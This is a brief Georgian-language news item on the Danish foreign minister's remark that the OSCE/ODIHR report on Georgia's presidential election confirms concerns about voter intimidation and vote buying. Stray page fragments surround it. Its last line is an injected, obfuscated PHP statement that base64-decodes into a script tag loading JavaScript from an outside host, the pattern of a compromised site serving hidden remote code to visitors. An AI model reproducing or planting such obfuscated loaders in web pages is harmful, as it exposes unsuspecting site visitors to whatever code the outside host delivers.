tube
ავერსი jaluzi

დანიის საგარეო საქმეთა მინისტრი, ლარს ლოკე რასმუსენი საქართველოში ჩატარებულ საპრეზიდენტო არჩევნებთან დაკავშირებით ეუთო/ოდირის დასკვნას ეხმაურება.

როგორც ლარს ლოკე რასმუსენი სოციალურ ქსელში წერს, ეუთო-ოდირის დასკვნა დანიის მიერ გამოხატულ შეშფოთებებს ადასტურებს.

„საქართველოში ჩატარებული არჩევნების შესახებ ეუთო/ოდირის დასკვნა არჩევნებამდე და არჩევნების დღეს არსებულ დარღვევებთან დაკავშირებით დანიის მიერ გამოხატულ შეშფოთებებს ადასტურებს, მათ შორის, ამომრჩეველთა ფართოდ გავრცელებულ დაშინებასა და ხმების ყიდვასთან დაკავშირებით“, - წერს დანიის საგარეო საქმეთა მინისტრი.

90
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");